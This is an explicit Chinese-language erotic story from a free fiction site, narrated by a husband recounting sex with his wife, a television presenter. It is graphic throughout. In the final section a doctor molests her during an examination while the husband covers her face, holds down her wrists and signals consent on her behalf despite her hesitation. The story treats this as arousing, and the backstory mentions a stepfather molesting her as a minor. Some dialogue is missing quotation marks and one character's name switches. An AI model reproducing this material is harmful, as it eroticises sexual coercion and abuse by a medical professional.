字幕網- 每日更新 永久免費

電視台當家花旦的黑絲美腿
作者:轉自網絡
        晚上7 :30,某市衛視第三演播室,正在錄製著一檔情感類談話類節目《幸福魔方》。演播廳左邊的長排沙發上坐著一個中年女性,正在傾訴自己的不幸,無非是那些老公外遇啊,自己辛苦啊之類的老生常談,這與本文無關。而本文的女主角,則是坐在她對麵那一張單人沙發的上的主持人,也就是我的愛妻——陳蓉。
  陳蓉21歲畢業於某名牌傳媒大學主持人係,畢業以後就進入某電視台實習,上中學時我們認識,相戀並結婚。在自己的努力以及各方麵的幫助下,蓉的事業發展迅速,不到5 年,就榮升某衛視一姐地位了。
  陳蓉在我耳邊輕聲說,讓你感受一下做大男人的滋味
  陳蓉其實是我的初中同學,但要大我兩歲,再加上她發育比較早,所以初二的時候她就已經164cm高,罩杯大約在B到C之間。陳蓉是標準的美女,瓜子臉,大眼睛,是班上的“四大美女”之一。從附件中的圖就可以看出來,她的雙腿格外漂亮,當時是學校裏大多數男生背後談論、心裏意淫的對象。她坐我後麵,我那時還是個小個子男生,跟丫頭似的特老實。
  陳蓉就讓我認她當姐,說是她會罩著我什幺的。不過事實上她確實也很照顧我,我有一次和班上男同學爭執,她就站起來二話不說一腳把那男孩給踹倒在地。但她家庭生活並不幸福,小學時父母就離異了,繼父竟對發育成熟的她不時動手動腳,這使得她對家沒有什幺依戀感,有過好幾次離家出走的經曆。
  於是她初中開始就和很多社會上的男生混在一起,幾乎認了好幾個本地有名的小流氓做哥。於是家庭貧困的她,零花錢比我多好些,還經常請我吃零食。當然這些錢肯定不是白來的,於是班上就有很多關於她的風言風語,比如說她打過胎什幺的,班主任老師還特地叮囑我要和她保持距離。我當然不在乎,她對我好,我就對她好。
   初中畢業,她就去省城念藝校去了,隔三差五還給我打電話,有兩次還買了兩本書寄給我,說是知道我喜歡看書。當然她挑的書和我的閱讀口味並不一致,不過仍然是我最珍貴的禮物。我大一那年暑假去北京實踐,陳蓉則在傳媒大學讀研究生,就讓我去她租的房子去玩。到了以後,她給我下廚做飯,我們還一起喝了好多啤酒。聊天的時候說到處女情結這個事情,我說還是有的男生會在乎吧。
  她就笑道,每次交新男朋友,就會告訴他,小時候因為騎自行車所以處女膜破了雲雲。於是後來聊天的尺度就越來越大,她開始給我講她經曆過的各色男人。特別是她藝校後的第二個男朋友,很有錢而且深受東洋文化影響,於是給她買了好多情趣用品和內衣。所以她被那個男人開發了許多,幾乎A片裏的花式她們都玩過。我就半開玩笑說,好想見識下。
  陳蓉起身壞笑道,你給我等著。她閃身進了裏屋,出來的時候我眼睛險些掉了下來。她穿著一身粉色性感比基尼,很省材料的比基尼,隻是用小塊半透明的布料遮擋住關鍵的位置。布料的邊緣還有些羽毛,將陳蓉那大小剛好卻膚質極好的酥胸承托得很撩人。陳蓉的腿很長且細,配上黑色絲襪就更凸顯了她的好身材。尚未更事的我隻是漲紅了臉靠在沙發上,不知該如何是好,下麵的太公則早已昂然挺立了。
  陳蓉走到我身前跪了下來,順著我的腿慢慢地爬到我身上,用身體緊緊地貼著我,在我耳邊輕聲說到:“讓你感受一下做大男人的滋味”。她解開我的襯衫,用她的酥胸緊緊地貼著我,慢慢地上下摩擦。這是我第一次感受到和女孩子嬌嫩的皮膚接觸的快感,於是忍不住摟緊她開始用力地親吻。
  她笑著推開我說,你不會,別動,我來就好了。於是我體會到了這輩子的第一次濕吻,卻也是最有技術含量的一次。很難去描述那種親吻的感覺,但讓我從此相信,高超的吻技這種東西是存在的,而且很可能是被女人掌握。她親吻了一會之後,就試著解開我的褲子,用手開始幫我套弄。雖然自己之前也曾自擼過,但感覺大不一樣,一則是陳蓉的皮膚很好,手很嬌嫩,所以有這種特別的輕柔觸感;二則是自己的快感是掌握在她的手裏,她不時會變換力度和節奏,給我突如其來的驚喜。
  下麵的情節大致和A片裏一樣,不過我和她沒有真正地做,她說還是希望把我的第一次留給我的新婚。她的口交很熟練,一開始會用舌尖環繞和刺激龜頭頂端,等感受到龜頭變大變硬了,才開始吞吐。最後她當著我吞下了我的子孫,她說她前男友告訴他,這能滿足男人的尊嚴感,讓男人心裏上很大的享受。
  
        【中】你才是這張大床的女主人,我不折騰你還能折騰誰
  正如大多數電視主持人一樣,能成為電視台的當家花旦,蓉的美貌、身材、氣質自不必說了。姣好的麵容上,柳眉杏眼,皓齒朱唇。為了一檔特別節目,陳蓉跟隨電視台節目組去韓國拍外景。這一去就是三個星期,在沒有陳蓉的日子裏,隻能每天夜深人靜的時候用輕薄的語言在電話裏調戲著我的美女老婆。早也盼,晚也盼,終於盼到了蓉出差回來的日子。
  這天一大早,我便開著車來到浦東國際機場接陳蓉的機。向來容易晚點的東航這次倒也十分給力,沒過多久,就見陳蓉托著一隻小的拉杆箱從安檢口走了出來。隻見陳蓉上身穿一件真絲的白色襯衣,外麵套了一件黑色OL套裝;下麵穿一條黑絲的連褲絲襪加一雙黑色的高跟鞋。看著陳蓉向我款款走來,我真恨不得一把衝上去摟住她穩個遍,可是她現在身邊都是同事,誒,三個星期都等下來了,還在乎多等一會幺。
  等到上了車,我迫不及待的撲向坐在副駕駛上的蓉,對著她的脖子就亂吻一氣,手也不老實地在她的身上亂摸起來。蓉一邊躲,一邊咂著嘴說道:「急、急、急,就知道急,你哪次不是這樣,大白天的就不怕被別人看到。你老婆好歹是電視台主持人。回去再說,你還怕我逃了……嗯」我當然還是不肯放過她,一下子吻住了蓉的雙唇。
  「調戲自己老婆不行啊,讓他們看好了。他們看了隻能回家自己擼,讓他們眼紅去吧。」「我……知道你……急,還是回去吧,這裏也……不舒服……呀。」蓉一邊躲著我的嘴,一邊解釋。
  一進到家裏,我迫不及待的關上大門。然後下子總後麵抱住了陳蓉,雙手環住她的纖腰,下巴用力地抵在她的左邊的肩膀上,身體緊貼她的後背。我撩開陳蓉的頭發,吻上了她的粉頸,手也不老實的攀上了她的胸部。雖然看不見,但是我還是輕車熟路地解開了一顆外套的口子,收從外套的領口伸了進去,隔著襯衫撫摸陳蓉的胸部。
  我一邊吻,一邊說:「蓉,我想死你了,三個星期,我,我想死你了。嗯」。
  可能是腳上還穿著高跟鞋的緣故,陳蓉被我突如其來襲擊搞得一個趔趄,一下子沒站穩。她掙紮了一下,本想掙脫出來,可是她那嬌弱的身子哪裏是我的對手,試了兩下發現沒用後隻得嚶嚀道:「哎呀,每次我出差回來你都那幺急,哎呀,你急什幺,怎幺這幺沒出息,站在大門口就欺負自己老婆。」的確,老是站著確實不夠舒服,既然老婆大人都開口了,那就照辦唄。於是,我放開陳蓉,彎下腰,一下子把她倒著抗在了肩膀上,手攬著陳蓉的腿彎。「啊……」陳蓉沒有準備,突然被我扛起,不由得驚呼了一聲,雙手在我後背上捶打;由於腿彎被我攬著,她那穿著高跟絲襪的一對小腿在我身前輕輕擺動,「放我下來,快放我下來呀」。我在陳蓉穿著絲襪的屁股上摸了一把,又輕輕一拍,「你說我沒出息是吧,走,我們臥室算賬。」上了樓走進臥室,我一下子把陳蓉扔到2.5 米長的豪華大床上。「啊……」,陳蓉仰躺著朝後重重地摔在了席夢思的大床裏,雖然不會疼,但還是驚呼了一聲。她剛直過身子,想用雙手把自己的身體撐起來,我直接撲了上去,跨騎在陳蓉的腰上,把她剛剛直起的身子生生地又按到了床上。我抓起她的雙手手腕,死死的按在陳蓉的身體兩側。
  陳蓉被我壓在身下,腰部和雙手都被我製住,無法動彈,隻能以扭動上身來進行似有似無的反抗者,故作嬌嗔「你輕點,你老婆是肉做的,受不了你這樣折騰,好疼……哎,你壓到我頭發了……快鬆開。」此時的我早已經忍不住了,那容得陳蓉有什幺分辨,我一邊壓著她,看著她嬌羞的臉龐,一邊說:「哼,折騰,老婆,我的好老婆,你才是這張大床的女主人,我不折騰你還能折騰誰,今天我要好好享用你,哈哈。老婆,我來了……」我俯下身,拂過陳蓉額前的劉海,開始狂吻她的額頭和和臉頰。可能是我口鼻的熱氣吹到了陳蓉的臉上,讓她覺得癢癢,陳蓉一邊笑一邊調皮的來回搖動著頭躲避著我的親吻。可越是這樣,越是激起了我征服陳蓉的欲望。於是,我用左手一手抓住陳蓉的雙手手腕,騰出右手,輕輕把住她的下巴,讓她無法再躲,然後,對著她的朱唇,一下子吻了下去。
  開始隻是唇吻,這當然不過癮啦。過了一會,我伸出舌頭,一下就鑽透了陳蓉的嘴唇,接觸到陳蓉那又軟又滑的香舌並開始於之交纏。我的舌頭在陳蓉的嘴裏,時而舔舐她的牙齒,時而摩擦她的舌頭根部,時而與她的舌頭互相追逐。剛剛還在做象征性反抗的陳蓉此時也慢慢的停止了動作,開始享受著這舌吻。乘著這個機會,我慢慢放開了製住陳蓉雙手的左手和把住她下巴的右手,陳蓉也沒有再次反抗,雙手乖乖地打開,攤在身體的兩側,本來還握緊拳頭的手,也慢慢的鬆開。
  吻了一會,我退出陳蓉的小嘴,開始向下進攻她的粉頸。「你……嗯……」,本來一直被占據的嘴好不容易被釋放了,陳蓉長長出了口氣,剛想說話,突然又覺得脖子上一熱,她當然知道我的下一步計劃。於是,她微皺眉頭,緊閉雙眼,配合地將頭盡量向後仰著,盡可能露出脖子讓我親吻。
  我也不遑多讓,從下巴一直吻到脖頸,從左邊一直吻到右邊,不一會覺得吻得不過癮了,幹脆解開陳蓉襯衫上的第一粒紐扣,露出了一小片雪白又紅潤的肌膚,緊接著我又是一陣狂吻,不過這會兒還附帶著用舌尖輕間斷的輕觸。我的手也沒閑著,向下移到了陳蓉胸部的位置,隔著OL套裝和襯衫,揉捏撫摸著她的胸部。陳蓉的胸部雖然不大,勉強夠得上C ,但是卻很挺,可以把OL套裝撐得恰到好處,比起那些動不動就大的離譜的E 級甚至S 級,堅固了性感和小清新的感覺。
  此時的陳蓉被吻得有點心裏發毛,身體發軟,說話也開始有氣無力,「別……別鬧了,你要的話,好歹……我這套衣服……是電視台配的,五千多呢,別你弄……啊。」隨著我在她胸部用力的一捏,原本就斷斷續續的話音被一聲尖叫打斷。我抬起頭,嘴唇離開陳蓉的粉頸,一邊上下打量著身下的俏老婆,一邊輕浮地說道:「哎呀呀,我的老婆,你又不是不知道你老公的這點愛好,不就是製服控+ 絲襪高跟控嘛,我就喜歡我的老婆穿著製服嘛,多有氣質,多正點,以前又不是沒這樣玩過。再說了,五千多的套裝怎幺了,不久一套衣服幺,玩壞了再買……」說著,我又俯下身,把臉緊緊地埋在陳蓉的胸口。雖然隔著襯衣和套裝,但還是能清楚的感受到陳蓉那堅挺乳房的溫熱和強烈急促的心跳。我貪婪得來回用臉蹭著陳蓉的胸部,雙手也一左一右的繼續肆虐地隔著衣物揉捏著她乳房,時而用力抓捏,時而大範圍揉搓。陳蓉此時已經有些興奮了,眼神迷離,呼吸急促,說話也含糊不清,「你……不要這樣……不要隔著……衣服……,不要這樣……我不要。」「啊?老婆,為什幺不要這樣啊?」其實我是明知故問,陳蓉做了我這幺久的老婆,難道我這點還不了解幺,但是此時我就是想逗逗她,一來是增加點情趣,二來稍微緩衝下我自己的衝動。
  陳蓉漲紅著臉,微微睜開原先緊閉的雙眸,有氣無力的回答:「你……隔著衣服……弄我,你能過……癮嗎?快把我的……衣服……衣服脫……了吧」「哈,老婆你不誠實哦,是你自己不過癮吧,是不是覺得這隔靴搔癢不夠刺激,老婆你大大的壞哦,嘿嘿,你的衣服我早晚會脫的啦,不過你還要再耐心的等一會兒哦。」陳蓉見她的心思被我一語道破,羞上加羞,雙腮又一紅,雙眼一閉,臉一偏,不再理我,隻剩下那聲聲嬌喘。我又在陳蓉的胸部停留了一會,準備轉移陣地。前麵已經說過,我除了對OL製服情有獨鍾以為,還是一名徹頭徹尾的絲襪高跟控。陳蓉天生麗質,而一雙玉腿更是完美無暇,大腿豐滿又沒有一丁點贅肉,小腿挺直又不缺乏彈性,而一雙小腳更是勻稱到家了。
  加上她今天穿的黑色連褲襪加上黑色漆皮高跟鞋的全黑組合對我的殺傷力更是沒的說,雖然陳蓉的雙腿已經被我享受了無數次,但我還是忍不住想一親芳澤了。想到這裏,我從陳蓉身上退下來,來到她的身體一側,抬起她的小腿放在懷裏。陳蓉躺在那兒,忽然覺得身上一輕,剛想開口說話,就發現自己的雙腿已經被抬起,便知道將要發生什幺。
  「你……你……你又要玩人家的……腿?你……你好變態……」陳蓉雙眼依然閉著,卻還是嬌嗔地挖苦我。
  「我變態,現在男人喜歡絲襪高跟鞋的多了去了,你上網看看,多少圖片,多少視頻都是關於絲襪的。對了,我的好老婆,告訴你個秘密哦,喜歡你的絲襪高跟的可不止你老公一個哦。好多人都喜歡呢。」我繼續用話調戲著陳蓉,而手上也開始了動作。我在陳蓉的小腿上摸了幾把後,放下她的左腿,左手捏著她右腳的腳腕,右手撫摸著漆黑鋥亮的漆皮高跟鞋和露在鞋子外麵裹著黑色絲襪的腳背。
  「你……你……胡說。」陳蓉邊說,邊試著把被我抓住的右腳抽回去,結果可想而知,她也就任由我抓著。
  「我胡說,嗬嗬,下次讓你看看人家網友在許多論壇上崗發的帖子,都在對你的絲襪高跟美腿朝思暮想呢。有的甚至一邊看著你的節目,一邊自己擼,他們做夢都想占有的你。可是真正占有你和你絲襪美腿的可隻有我哦,讓他們羨慕嫉妒恨吧,哈哈哈。」說話間,王玨右腳上的高跟鞋已經被我熟練的褪下。
  「變……態,你……真變態……哼……你隻會欺負……自己的……老婆……」陳蓉又羞又愧,但除了嘴上無力反駁,此時此刻,她還能怎幺樣呢。她的話還沒說完,左腳上的高跟鞋也被華麗麗的去除了。
     
        【下】完美的玉腿加上黑絲連褲絲襪包裹的手感,簡直令人陶醉
  脫掉了兩隻高跟鞋,陳蓉的兩隻裹著黑色絲襪的腳毫無保護的等待著我的蹂躪。我還是先用一隻手抓起左腳的腳腕稍稍抬起。就在腳心這方寸之地,我使出自創的「玩足八法」,將陳蓉的雙腳玩弄於股掌之間,從腳背到腳心,從腳尖到腳腕,我沒有放過一寸領地,在腳心,我用撓的;在腳背,我用搓的;在腳尖,我用捏的,在腳腕,我用撓的,可能連專業的足療師也未必有我的功夫吧。陳蓉被這一陣進攻弄得奇癢難當,可是又渾身無力,無法反抗,隻能口中求饒,而我又怎幺會放過她呢,左腳弄完了,右腳也「享受」了完全相同的帶待遇。
  撫摸過陳蓉絲襪腳上的每一寸肌膚後,我的手開始向上移動,來到了她的小腿和大腿。陳蓉的小腿正麵修長端正,後麵的小腿肚緊實而富有彈性;大腿則略顯豐滿,但絲襪無贅肉。我的手就在大腿和小腿之間來回的遊走,完美的玉腿加上黑絲連褲絲襪包裹的手感,簡直令人陶醉。
  隨著我有節奏且溫柔的撫摸絲襪美腿,剛剛還氣喘噓噓的陳蓉也慢慢的平靜下來,幾次長長的出氣後,她慢慢睜開眼睛,用嬌羞而又哀怨的眼神看著我說:「你說你為什幺每次都要摸我的腿呢,還非得穿著絲襪高跟鞋,你說吧,從第一次上床到現在,我哪次不是穿著絲襪,白色的,肉色的,黑色的,灰色的,基本上都沒你摸過了。」我並沒有停下手上的動作,一手在陳蓉左腿的膝蓋上輕輕撫弄,另一隻手則在她右大腿上揉捏,「誒,我的老婆啊,這問題我都回答了好幾次了呀,那是因為我老婆人美,腿美,穿絲襪更美。嘿嘿,所以不僅我的手要摸,我的小弟弟也迫不及待地要摸呢。」是的,如此的絲襪美腿,光用手來愛撫,當然是不夠的啦,隨著陳蓉「啊」的一聲,她的身子已經被整個翻了過來,姿勢從躺著變成了俯臥在床上。我曲起他的小腿,讓她的腳心朝上。接著,我一下子解開自己的褲子,彈出早已挺得硬邦邦的陰莖,開始一下一下的在陳蓉的腳心上蹭起來。
  哇塞,那感覺,腳心的溫熱與絲襪的質地不斷地刺激著我的龜頭,一陣蘇蘇麻麻的觸感與柔軟誘人的溫度從那一點觸發,然後慢慢的傳輸到下體,接著傳遍全身。記得第一次幹陳蓉的絲襪腳,我沒把持住,沒幾下就交了槍,但是現在的我可大不一樣了。蹭完陳蓉腳心,我又分開陳蓉的雙腿,然後騎到了其中的一條腿上,用陰莖頂著下麵的絲襪腿一下一下的摩擦。
  在幹陳蓉絲襪的腿的同時,我把她的OL套裙推到了腰部以上,露出黑色連褲襪包裹著的小屁股。資深的絲襪控應該都知道,質量上乘的黑色連褲襪在屁股以上的部分顏色會略微變深,但就是這細微的變化此時衝擊著我的視覺的神經。我大力地隔著絲襪一把一把的捏著陳蓉的屁股,完全沒有之前「玩足八法」那樣的細膩手段,隻是發泄著心中的欲火。
  一會兒覺得不過癮,幹脆伏下身子,狂吻著陳蓉的絲襪美臀。就這樣,我下麵頂著絲襪美腿,上麵吻著絲襪美臀,把陳蓉的絲襪享受到了極致。剛剛平靜了沒多久的陳蓉也又一次被我整的氣喘籲籲,嬌嗔 連連。是時候給老婆加點火候了,我停下了正在吻絲襪美臀的嘴,直起身,伸出 右手的食指和中指在陳蓉大腿內側遊動,並緩緩地朝她兩腿之間的滑去。
  不一會兒,我的手指便觸到了陳蓉兩腿之間的隱秘之處,雖然尚有的襠部的絲襪和內褲保護著,但還是能感覺到一陣潮濕,稍稍用力,便能隔著絲襪和內褲感覺到那一條縫隙的存在。我食指就在這條溝壑外圍摩挲,從外向裏,再有裏向外,但偏偏就是不觸及那最敏感的部分。當我手指每次靠近禁地時,陳蓉呻吟聲就急促,好像是再鼓勵我;而當我手指又院裏時,她又好像顯得很失落。
  「快,快……來,我想……了,快……」陳蓉開始沉不住氣了。
  「快什幺?想什幺?你說呀,你不說我怎幺知道?」我知道她的矜持快到盡 頭了,於是趁熱打鐵地「逼問」著。
  「我……你……快……快幹我,快上我,我要你快幹我,幹你老婆,幹陳蓉……我的下麵受不了了,需要你來幹。」終於,陳蓉放下了矜持,終於開了口。同往常一樣,一旦開了口,便一發不可收拾,一連串的淫詞浪語接踵而出。
  到了這個地步,我也無需再忍了,我的陰莖的絲襪腿「前菜」已經嚐夠了,是時候享受正餐了。我先用手指隔著絲襪和內褲在陳蓉的禁地上按了幾下,然後捏起那裏的絲襪襠部,「撕拉」的一聲,撕開了一個杯口大小的洞,露出了裏麵黑色的小內褲。接著,我又把她的內褲別向一邊,終於最後一層保護也去除了,陳蓉那久違三個星期的「花蕊」終於再次綻放在我的麵前。
  我也等不起了,一下子壓到陳蓉身上,陰莖對準她的「花蕊」一挺腰,一用力,「咕唧」一聲來了個「神龍探穴」。進入的一刹那,陳蓉的頭猛的向後仰起,「呀」大呼一聲,然後又慢慢的趴倒在床上。
  進入陳蓉的身體後,一種熟悉而又奇妙的感覺從我們的身體交彙處蔓延開來。陳蓉花心內濕濕的,暖暖的,緊緊裹著我的陰莖。隻要稍微一抽動,陰道壁與陰莖間的些許摩擦便會碰撞出一陣陣令人陶醉的快感。我伏在陳蓉的背上,開始慢慢地抽動陰莖。
  我從背後湊到陳蓉的耳邊,半真半假的挑逗起她:「老婆,你下麵怎幺還是那幺緊啊,還是跟小姑娘似的,裹得我好舒服啊,哦……」陳蓉被我壓著趴在床上,早已「進入狀態」,半喘氣半嬌喘,雖然意識還是清楚的,但是已經說不出一句完成的話了,「我……想……想……快點,哦……啊……」我也不再說話,得要的就是那種感覺,喜歡那裏的氣氛陰莖的抽插開始一次比一次快,一次比一次深,一次比一次力度大。四五十次過後,一股勁直衝腦門,眼看快仍不住就要射了。我當然不能這幺快就結束,不然在老婆麵前繳槍投降多沒麵子。我做了幾次深呼吸,平靜了下劇烈跳動的心髒,然後慢慢的停下抽動,感覺沒那幺強烈了,便將陰莖退出了陳蓉的陰道。
  趁這個時候,一下子把陳蓉又翻了個身,讓她仰躺著,麵對著我。我分開陳蓉的雙腿,又一次將始終挺直的陰莖又一次插進了陳蓉的花心深處。這次我並沒有馬上啟動,而是伸出手,撫摸著陳蓉的頭發,臉頰,脖頸。
  陳蓉眼神迷離,麵帶潮紅,檀口微張,嬌喘連連,雖然沒此時語言,不過陳蓉臉上神情還是洋溢著幸福和渴望。看著陳蓉一起一伏的胸部,我心中一蕩,好像有什幺東西猛烈得撞擊著。我開始瘋狂地脫去陳蓉上身的衣物,其實與其說是脫,不如說是扯,與其說是扯,不如說是撕。OL套裝的上衣的衣領被我扯開了一個口子,白色真絲襯衫的口子全被我拉斷,而最裏麵的黑色內衣,也被我一下子推了上去。
  「啊,啊,老婆,我要你,我受不了了,我等了好久了,我要你,我要……」「快……要我,快上……我,要我,我最喜……歡你這樣了。我是……你的 ……陳……蓉,陳蓉……是你一個人……的……女人。」這個時候,一切技巧,一切想法都是多餘的,我和陳蓉都回歸了人類最原始的野性。終於在兩人肆無忌憚的呼喊聲中同時達到了高潮。終於,世界又回歸了平靜。
  
        【尾聲】做個色夢不打緊,挨了老婆一耳光
  上個周末陪陳蓉去醫院檢查身體,我和老婆回家後,一進門我就迫不及待的抱起老婆往臥室走,老婆驚呼:“你做什幺?”我色迷迷的說:“美女,肯定是做壞事了。”一到床上我立刻把老婆扒的隻剩一條內褲的時候,看見非常明顯的一大片水漬,我一邊隔著丁字褲撫摸老婆的陰唇,一邊貼近老婆的耳朵輕聲說:“老婆,你下麵好濕哦,怎幺流那幺多水啊,內褲都打濕了。”
  胡說,那是白唔…”我不等她說完就一個熱吻堵住她的嘴。我一邊親吻著陳蓉,一邊揉捏著老婆的乳頭,右手把老婆的丁字褲往下拉。老婆肯定也早就情欲高漲了,抬起屁股配合著把丁字褲脫下來,我起身三下五除二脫光衣服就壓了上去。
  等一下,窗簾沒拉上,去把窗簾拉上。”陳蓉一邊推我一邊說,“我們對麵又沒有高樓,誰看的到,除非坐直升飛機來看”我回答說。這個時候我哪還有心思去拉什幺窗簾。說著把老婆腿一分腰一挺,立刻感覺小弟弟被溫軟緊緊包裹著,好一個溫柔鄉,我承認在這樣的溫柔鄉裏無法自拔。
  老婆,你那裏好燙,燙的我好舒服。”
  燙死你。”
  那老婆你就享受不了性福了。”
  沒有更好,反正我又不稀罕。”
  真的嗎?”我一陣猛烈抽插。
  老婆,舒不舒服?”
  舒…服。”
  感覺好不好?”
  好,你這兩個蛋蛋打的我好舒服。”陳蓉一邊說一邊伸手過來輕輕抓了抓我的蛋。受到老婆的鼓勵,我更加快速抽插,就為她說的兩個蛋蛋打的她好舒服。我一邊抽插一邊俯下身去吮乳頭,老婆的乳房不大,我用力把老婆的乳尖含在嘴裏,舌頭在口腔裏不停撩撥乳頭,一邊揉捏著老婆的另一個乳頭。一會兒揉捏一會兒用掌心象搓麵團一樣搓揉乳頭。
  陳蓉特喜歡我這樣,勝過插她。以前做愛她堅決不要上來就插,非要經過搓揉乳頭把她性欲徹底激發才肯讓我插她,可能今天的婦科檢查已經把她的情欲激發起來了,所以才讓我上來就插進去。
  在我上下雙重攻擊下,陳蓉幾乎要忘情喊叫出來。有時候女人的叫床聲真的是性奮劑。我把老婆的雙腿抬起壓在她的胸前,一邊快速抽插一邊問:“老婆,怎幺樣,有沒有高潮。”
  有。”
  有幾次高潮了?”
  不知道,有好多次了。”……
  老婆,我不行了,我要射了。”
  不要射,我還要。”這女人啊,就是口是心非,剛才還說不稀罕,現在又說還要,可已經到了臨界點了,怎幺可能忍的住,隻感覺一股熱浪從小腹深處洶湧激射而出,好爽啊。
  嗯…快去拿毛巾來我擦一下。”陳蓉嬌嗔的輕輕拍了一下我的臉,口氣帶著意猶未盡不滿的說,我趕緊下床把毛巾遞給老婆。打掃完戰場,我摟著她躺在床上休息。老婆按著小腹說:“我感覺小肚子有點不舒服。”“怎幺了?感覺怎幺不舒服?”我忙伸手輕輕揉著她的小腹。
  感覺有點脹痛脹痛的,是不是你剛才太用力了?”
  哪有啊,我們不是一直這樣做的嗎?以前都沒痛過。”
  你還說,這兩天你比以前猛烈多了,特別是剛才。”
  是嗎?不過你也感覺很好啊。”
  我在和你說正經的,你剛才是不是弄傷我了。”老婆擰了我一下。
  不會吧,我看看。”
  裏麵弄傷了你這樣能看的到?”陳蓉掀起我的頭說。
  那我們先休息一下,如果還是痛的話就去醫院看一下。”
  嗯”,陳蓉很溫順的躺在我的左手臂彎裏吻了我臉一下,我很幸福的把她摟在懷裏,左手輕輕揉捏著老婆的乳頭,右手去摸老婆的陰唇,老婆也很乖巧的把腿分開方便我摸。
  我們第三次來到醫院,還好沒下班。我找到給陳蓉做檢查的醫生,我這才注意到他白大褂的上衣口袋上掛的工作牌上寫著“趙xx”,我對他說明來意:“趙醫生,剛才我老婆說她小腹有些脹痛,是不是因為剛做完檢查的正常反應?”我說正常是向醫生表明他們沒責任,避免引起不滿。“應該不可能,那幺多病人來檢查,從來沒出現過這種情況。”趙醫生也很驚訝,“那你們過來我看一下。”
  他把我們帶到走廊盡頭的一個檢查室。走進檢查室,趙醫生把門關上回頭看了我老婆一眼說:“你先躺上去,兩腿放在支架上,我檢查一下。”我忽然覺得女人就是奇怪,隻要有了第一次邁過那道坎,就不會覺得難堪別扭了。考慮到穿脫麻煩,所以來的時候穿的裙子,陳蓉上午第一次檢查時的忸怩,撩起裙子脫下丁字褲到檢查床上躺好。我忽然覺得很奇怪,怎幺彩超檢查會有婦科設備和項目?
  你們做彩超檢查還附帶做婦科檢查治療?”
  不是的,主要是根據檢查需要”趙醫生回答我。
  我看是根據你們需要吧”我湊近趙醫生在他耳邊悄悄的說。趙醫生回頭看一臉奸笑,“嘿嘿”幹笑兩聲算是默認吧,然後他去洗了手從櫃子裏拿出一個密封塑料,我看了一下,上麵寫著一次性無菌陰道擴張器。趙醫生又拿一個比較大的塑膠套子戴在頭上,上麵是一麵鏡子,中間有一個中指粗細的圓孔。他走到檢查床前在老婆兩腿之間坐下,理了理陳蓉的陰毛說:“你們剛剛做過愛吧?”
  你怎幺知道?”我一下脫口問。
  從陰唇充血的情況看,剛經過激烈的性愛摩擦所致。”趙醫生一邊說一邊輕揉陳蓉的陰唇,分開看了看:“陰道口還殘留黏液,放鬆點不要緊張,我用陰道擴張器看一下裏麵的情況。”說著他拿起托盤裏的陰道擴張器,左手分開老婆的陰唇慢慢插進去旋轉90度,然後慢慢用力張開陰道固定好,然後調整戴在頭上的鏡子,原來是反射燈光照明用的。我很好奇的在醫生背後從張開的陰道口往裏看,看到一個圓球,圓球中間有個孔,估計那就是子宮頸了。同時我聞到一股精液的氣味。我看了一下趙醫生,沒戴口罩,那他肯定也聞 到了。
  陰道深處有白色液體和一股精液味道,應該是剛射進去不久的。”趙醫生邊看邊說,“子宮頸有點紅腫。”
  嚴重不嚴重啊?”我急切的問。
  那是正常現象,不要緊張,做過愛後基本都是那樣,而且精液也能夠幫助殺菌,所以不會有事的。平時多注意一下子宮和陰道的保健保養。”趙醫生慢慢站起來,我看見他順手掏了一下襠部,估計是陰莖勃起頂著褲子了。
  怎幺做?”
  你知道那些醫療保健吧,好比女性SPA ,保健按摩這些都是。當然你們最好是去正規的醫院或保健中心去做,否則不但沒效果,還可能起反作用。”
  我遲疑了一下,問:“你能先給我們演示介紹一下嗎?”趙醫生看了看我老婆沒回答我。我走到陳蓉身邊俯下身在她耳輕聲問:“老婆,你覺得怎幺樣?先讓他給你按摩治療一下?”老婆輕輕點了點頭。
  除了按摩還有其他保健方法嗎?”
  當然了,還有衝洗等治療項目,我先去準備一下。”說完開門走了出去。
  我關上門,把陳蓉的連衣裙連同胸罩推到頸部,用連衣裙蓋住老婆的臉,張口把早已翹立的乳頭含在嘴裏,左手搓揉另一邊的乳頭,右手伸手去摸老婆的陰部,因擴陰器還插在老婆陰道裏沒取出來,所以隻能搓揉老婆的陰蒂和陰唇。老婆的呼吸沉重起來。
  你真的要讓他碰我啊?”陳蓉似乎有什幺預感突然問,我抬起頭裝著沒聽懂她的話:“他不是已經碰過你兩次了嗎?”老婆一時語塞,正想反駁我的時候,聽見咚咚咚的敲門聲。我起身把門打開,趙醫生拿著瓶子和一個估計是衝洗器的東西進來,看到老婆的樣子,淫邪的笑了一下。我回頭一看,原來是我剛才起身開門沒把老婆的裙子和胸罩放下來,這樣老婆除了頸部上方就全裸躺在檢查床上,兩腿分開放在支架上,而兩腿之間插著一個擴陰器,那情形簡直淫靡極了。
  陳蓉應該感覺趙醫生進來了,抬起手想把裙子和乳罩拉下去,我伸手過去抓住老婆的手,阻止了她的動作。老婆象征性的掙紮了一下就不動了。趙醫生取出插在老婆陰道裏的擴陰器後走到老婆身邊,雙手放在老婆的小腹上說:“我先示範一下子宮保健按摩,然後再教你穴位按摩。”說著雙手就開始在老婆小腹上來回推拿。我現在即便無心學,也得裝個樣子。
  我怔怔的看著醫生非常敬業的給陳蓉做按摸,漸漸的另一隻手不自覺的就攀上了老婆的乳峰揉捏著老婆的乳頭,而另一隻手一直抓住老婆的兩個手腕,把老婆的雙手壓在她頭頂上方的枕頭上。不一會兒就聽見老婆發出微弱的呻吟聲。隻見兩隻手一會兒在小腹上反複推拿,一會兒順勢滑到大腿根部。每次按到大腿根部的時候,我都感覺老婆的身體在顫抖,仔細看才發現他是在輕揉老婆的陰蒂和陰唇。而老婆的呼吸越來越重,呻吟聲開始變得大聲了。
  按摩了大約五六分鍾,趙醫生說:“現在給你們介紹幾個穴位,即可以保健也可以增強性欲,要不要給你們介紹一下?”我轉頭問陳蓉:“要不要給你按一下,看看效果如何?”老婆沒回答,我把蓋著她頭的裙子往上拉了點,隻露出鼻孔和嘴巴,“嗯?”我親了她嘴唇一下詢問的哼了一聲。“嗯。”得到老婆的允許,我抬起身對趙醫生點了點頭。趙醫生走到老婆兩腿之間,摸著襠部看著我的眼睛做了一個很隱秘的頂的動作,他的意思我很明白,而我竟然毫不猶豫的點了一下頭。
  趙醫生馬上開始雙手延著肚臍中線,由肚臍上方開始往下按,每按一下介紹穴位的名稱和作用,而我一個字都沒聽進去,一直按到陰蒂上,我見他開始一隻手搓揉陰蒂,一隻手去把陰莖掏出來,真醜陋,有點黑,不算粗,也不算長。估計不知道插過多少女人了。趙醫生並沒有急於插入,而是把中指插進老婆的陰道尋找老婆的G點。
